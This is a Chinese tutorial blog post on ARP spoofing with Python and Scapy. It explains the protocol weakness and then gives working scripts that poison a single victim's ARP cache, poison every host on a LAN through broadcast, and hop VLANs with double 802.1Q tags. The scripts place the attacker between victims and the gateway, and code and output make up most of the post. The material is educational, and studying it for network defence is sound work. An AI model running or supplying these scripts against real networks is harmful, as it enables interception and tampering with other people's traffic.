
Python 协议攻击脚本(五): ARP欺骗 Arpspoof

程序员文章站 2022-05-16 21:26:52

ARP

arp协议

ARP(Address Resolution Protocol)即地址解析协议, 用于实现从 IP 地址到 MAC 地址的映射,即询问目标IP对应的MAC地址,位于数据链路层。

arp欺骗

ARP欺骗(ARP spoofing),又称ARP毒化(ARP poisoning):攻击者向局域网内的访问者PC发送伪造的ARP报文,声称网关IP对应的是攻击者的MAC地址。由于ARP协议没有任何认证机制,主机会直接用收到的映射更新自己的ARP缓存,于是访问者PC发往网关的数据包都会先经过攻击者,从而实现窃听或篡改。

构造数据包

环境

网关 : 10.35.71.254
目标机 : 10.35.71.205
攻击机 : 10.35.68.121

利用Scapy分别获取目标机、网关以及攻击机自身的MAC地址(getmacbyip 通过发送ARP请求解析 IP 对应的 MAC)

>>> getmacbyip('10.35.71.205')                                                    
'a0:8c:fd:1b:cb:90' #目标机mac地址
>>> getmacbyip('10.35.71.254')                                                           
'74:25:8a:6a:09:1d' #网关mac地址
>>> get_if_hwaddr('eth0')                                                                 
'00:0c:29:62:44:de' #自己的mac地址

ARP

>>> ls(ARP)
hwtype     : XShortField                         = (1)
ptype      : XShortEnumField                     = (2048)
hwlen      : FieldLenField                       = (None)
plen       : FieldLenField                       = (None)
op         : ShortEnumField                      = (1)
hwsrc      : MultipleTypeField                   = (None)
psrc       : MultipleTypeField                   = (None)
hwdst      : MultipleTypeField                   = (None)
pdst       : MultipleTypeField                   = (None)

构造ARP需要我们注意的有5个参数:

  • op 取值为1或者2,分别代表ARP请求(who-has)或ARP响应(is-at)。本文用 op=1 构造欺骗包:目标机收到指向自己的请求时,一般也会把报文中的 psrc→hwsrc 映射写入ARP缓存;若个别系统不接受请求报文,可改用 op=2。

  • hwsrc 发送方Mac地址。

  • psrc 发送方IP地址。

  • hwdst 目标Mac地址。

  • pdst 目标IP地址。

ARP欺骗:向目标机发送ARP包,其中发送方IP(psrc)填网关IP、发送方MAC(hwsrc)填攻击机MAC,相当于告诉目标机“网关IP对应的MAC是攻击机的MAC”;目标机据此更新ARP缓存后,发往网关的流量就会先到达攻击机。

packet=Ether(src=攻击机mac,dst=目标机mac)/ARP(hwsrc=攻击机mac,hwdst=目标机mac,psrc=网关ip,pdst=目标机ip,op=1)


>>> mac_self = get_if_hwaddr('eth0')                                   
>>> mac_target = getmacbyip('10.35.71.205')   
>>>packet=Ether(src=mac_self,dst=mac_target)/ARP(hwsrc=mac_self,hwdst=mac_target,psrc='10.35.71.254',pdst='10.35.71.205',op=1)                 
>>> packet.show()                                              
###[ Ethernet ]### 
  dst= a0:8c:fd:1b:cb:90
  src= 00:0c:29:62:44:de
  type= 0x806
###[ ARP ]### 
     hwtype= 0x1
     ptype= 0x800
     hwlen= None
     plen= None
     op= who-has
     hwsrc= 00:0c:29:62:44:de
     psrc= 10.35.71.254
     hwdst= a0:8c:fd:1b:cb:90
     pdst= 10.35.71.205

正常的arp缓存表 arp -a

Python 协议攻击脚本(五): ARP欺骗 Arpspoof

发送包

>>> sendp(packet,loop=1)       #sendp 发送二层(链路层)包;loop=1 表示持续发送直到 Ctrl+C
[...]

毒化后

Python 协议攻击脚本(五): ARP欺骗 Arpspoof

编写脚本

1.demo

#!/usr/bin/env python3
# -*- coding:utf-8 -*-

from scapy.all import (
    get_if_hwaddr,
    getmacbyip,
    Ether,
    ARP,
    sendp)

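def arp_spoof(target, host, iface, interval=1.0):
    """Poison *target*'s ARP cache so that *host* resolves to our own MAC.

    Args:
        target: IP address of the victim whose ARP cache is poisoned.
        host: IP address we impersonate (the gateway in the demo).
        iface: interface whose MAC is advertised and on which frames are sent.
        interval: seconds between consecutive poison frames (keyword, optional).

    Runs until Ctrl+C. Raises SystemExit if *target*'s MAC cannot be resolved.
    Note: this demo does not restore the victim's cache on exit; the poisoned
    entry stays until it ages out or the real host re-announces itself.
    """
    import time

    mac_self = get_if_hwaddr(iface)
    mac_target = getmacbyip(target)
    # getmacbyip() returns None when the target does not answer.  Passing None
    # on as dst/hwdst would make scapy fall back to its defaults (broadcast),
    # silently widening a single-host attack to the whole segment -- refuse.
    if not mac_target:
        raise SystemExit('[-]Error: Could not resolve target MAC address')

    # op=1 (who-has) claiming "host is at mac_self"; the victim learns the
    # sender mapping from the request.  Built once, re-sent in the loop.
    packet = (Ether(src=mac_self, dst=mac_target) /
              ARP(hwsrc=mac_self, hwdst=mac_target, psrc=host, pdst=target, op=1))
    try:
        while True:
            sendp(packet, iface=iface, verbose=False)
            # Re-assert the mapping periodically instead of flooding: a
            # back-to-back loop saturates the link and is trivially spotted.
            time.sleep(interval)
    except KeyboardInterrupt:  # Ctrl+C
        print('\n[+]Stopped poison')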

if __name__ == '__main__':
    # Lab values: poison 10.35.71.205 so that it maps the gateway
    # 10.35.71.254 to our MAC, sending from eth0.
    target, host, iface = '10.35.71.205', '10.35.71.254', 'eth0'
    arp_spoof(target, host, iface)

运行演示

Python 协议攻击脚本(五): ARP欺骗 Arpspoof

2.添加广播式的arp欺骗

这会对局域网内所有主机进行欺骗,所有主机都会把攻击机当作网关。注意:广播模式会影响整个网段上的每一台主机,流量全部经过攻击机,影响面和被发现的概率都远大于针对单个目标的欺骗。

#!/usr/bin/env python3
# -*- coding:utf-8 -*-

from scapy.all import (
    get_if_hwaddr,
    getmacbyip,
    Ether,
    ARP,
    sendp)

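def arp_spoof(target, host, iface, interval=1.0):
    """Poison ARP caches so that *host* resolves to our own MAC.

    Args:
        target: victim IP. An empty value switches to broadcast mode, which
            poisons every host on the segment.
        host: IP address we impersonate (the gateway in the demo).
        iface: interface whose MAC is advertised and on which frames are sent.
        interval: seconds between consecutive poison frames (keyword, optional).

    Runs until Ctrl+C. Raises SystemExit if a given *target*'s MAC cannot be
    resolved. The poisoned caches are not restored on exit.
    """
    import time

    mac_self = get_if_hwaddr(iface)

    if target:
        mac_target = getmacbyip(target)
        # None would make scapy fall back to broadcast and poison the whole
        # segment instead of the one host that was asked for -- refuse.
        if not mac_target:
            raise SystemExit('[-]Error: Could not resolve target MAC address')
        packet = (Ether(src=mac_self, dst=mac_target) /
                  ARP(hwsrc=mac_self, hwdst=mac_target, psrc=host, pdst=target, op=1))
        print('[+]Poisoning --> ', target, end=' ')
    else:
        mac_broadcast = 'ff:ff:ff:ff:ff:ff'
        # pdst is left at its default here: the original passed the empty
        # target string, which is not a valid IP address.
        packet = (Ether(src=mac_self, dst=mac_broadcast) /
                  ARP(hwsrc=mac_self, hwdst=mac_broadcast, psrc=host, op=1))
        print('[+]Poisoning --> Lan', end=' ')

    try:
        while True:
            sendp(packet, iface=iface, verbose=False)
            # Periodic re-assertion rather than a flood (link saturation,
            # trivially detected).
            time.sleep(interval)
    except KeyboardInterrupt:  # Ctrl+C
        print('\n[+]Stopped poison')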

if __name__ == '__main__':
    # An empty target selects broadcast mode: every host on the segment is
    # told that the gateway 10.35.71.254 lives at our MAC.
    target, host, iface = '', '10.35.71.254', 'eth0'
    arp_spoof(target, host, iface)

3.完善代码

加入了跨VLAN的功能(通过叠加两层 802.1Q 标签,即 double tagging)。注意:这种双标签方式通常是单向的——目标机的回包不会沿同一路径回到攻击机,并且依赖交换机 trunk 端口 native VLAN 的具体配置,能否生效需要在实际环境中验证。

详见Python黑帽编程 3.4 跨域VLAN | 玄魂工作室

#!/usr/bin/env python3
# -*- coding:utf-8 -*-

from scapy.all import (
    get_if_hwaddr,
    getmacbyip,
    ARP,
    Dot1Q,
    Ether,
    sendp,
)
import argparse
import os
import sys
import time

mac_broad = 'ff:ff:ff:ff:ff:ff'  # Ethernet broadcast MAC, used for segment-wide poison/recover frames

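def arp_spoof(iface, target, host, vlan_own=False, vlan_target=False, interval=1.0):
    """Poison ARP caches so that *host* resolves to this machine's MAC.

    Args:
        iface: interface whose MAC is advertised and on which frames are sent.
        target: victim IP; empty/None broadcasts the poison to the whole segment.
        host: IP being impersonated (typically the gateway).
        vlan_own: our own VLAN id (outer 802.1Q tag) when VLAN hopping is used.
        vlan_target: the victim's VLAN id (inner tag); a falsy value disables tagging.
        interval: seconds between consecutive poison frames (keyword, optional).

    Runs until Ctrl+C, then calls arp_recover() to re-announce the real mapping.
    Exits with status 1 if the target's MAC cannot be resolved.
    """
    mac_self = get_if_hwaddr(iface)  # our own MAC

    if target:
        mac_target = getmacbyip(target)  # victim MAC
        # None would make scapy fall back to broadcast and widen the attack
        # to the whole segment; bail out instead.
        if not mac_target:
            print('[-]Error: Could not resolve targets MAC address')
            sys.exit(1)

        ethernet = Ether(src=mac_self, dst=mac_target)
        arp = ARP(hwsrc=mac_self, psrc=host, hwdst=mac_target, pdst=target, op=1)
        print('[+]Poisoning --> ', target, end=' ')
    else:
        ethernet = Ether(src=mac_self, dst=mac_broad)
        arp = ARP(hwsrc=mac_self, psrc=host, op=1)
        print('[+]Poisoning --> LAN', end='')

    if vlan_target:
        # Double 802.1Q tag: outer = our VLAN, inner = the victim's VLAN.
        # Both ids must go in as the ``vlan=`` keyword and as integers:
        # argparse hands them over as strings, and a positional argument to
        # Dot1Q() is interpreted as raw bytes to dissect, not as the VLAN id.
        vlan_tag = Dot1Q(vlan=int(vlan_own)) / Dot1Q(vlan=int(vlan_target))
        pkt = ethernet / vlan_tag / arp
    else:
        pkt = ethernet / arp

    print(" ('Ctrl + C' stop)")

    try:
        while True:
            sendp(pkt, iface=iface, verbose=False)
            # Re-assert periodically instead of flooding the link.
            time.sleep(interval)
    except KeyboardInterrupt:
        print('\n[+]Stopped poison')
        # NOTE(review): arp_recover() sends an untagged frame, so in
        # VLAN-hopping mode the victim's cache is presumably not restored.
        arp_recover(iface, host)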

#发送正常的arp包
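def arp_recover(iface, host):
    """Re-announce *host*'s real IP->MAC mapping to the segment after poisoning.

    Sends two broadcast ARP requests one second apart, with *host*'s real MAC as
    both the Ethernet source and the ARP sender, so poisoned caches relearn it.

    Args:
        iface: interface to send on.
        host: IP whose real mapping is re-announced (the impersonated host).

    Prints a warning and returns without sending if *host* does not answer.
    """
    time.sleep(1)  # brief pause after the last poison frame (original behaviour)

    print('[*]Recovering the network')

    mac_host = getmacbyip(host)
    # If the real host does not answer, Ether(src=None)/ARP(hwsrc=None) would
    # be filled in with scapy's defaults, i.e. our own MAC -- the "recovery"
    # frame would then re-poison every cache on the segment. Bail out.
    if not mac_host:
        print('[-]Error: Could not resolve host MAC address, caches not restored')
        return

    pkt = Ether(src=mac_host, dst=mac_broad) / ARP(hwsrc=mac_host, psrc=host, op=1)
    sendp(pkt, iface=iface, inter=1, count=2, verbose=False)  # inter: gap between the 2 frames

    time.sleep(1)

    print('[+]Complete')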

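def main():
    """Parse the command line and start poisoning.

    Refuses to run without root: injecting raw frames with sendp() needs it.
    """
    if os.geteuid() != 0:
        print('[-]Need root user to run')
        sys.exit(1)

    usage = 'usage: arp_spoof.py [-h] [-i IFACE] [-t TARGET] [-vl vlan_own vlan_target] host'
    parser = argparse.ArgumentParser(usage=usage)
    parser.add_argument('-i', '--iface', default='eth0', help='The network interface of use')
    parser.add_argument('-t', '--target', help='Specify a target to ARP poison')
    # type=int: VLAN ids must reach Dot1Q() as integers, and argparse then
    # rejects non-numeric values with a usage error instead of a late failure.
    parser.add_argument('-vl', '--vlan', nargs=2, type=int, help='The vlan hopping of use eg:-vl 1 2')
    parser.add_argument('host', help='host of impersonate')

    # argparse reports bad input itself (usage message + SystemExit); it never
    # raises ValueError, so the former except-clause around this was dead code.
    args = parser.parse_args()

    if args.vlan:
        arp_spoof(args.iface, args.target, args.host,
                  vlan_own=args.vlan[0], vlan_target=args.vlan[1])
    else:
        arp_spoof(args.iface, args.target, args.host)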

if __name__ == "__main__":  # script entry point; not run when imported
    main()

参考

Python灰帽编程 3.1 ARP欺骗 | 玄魂工作室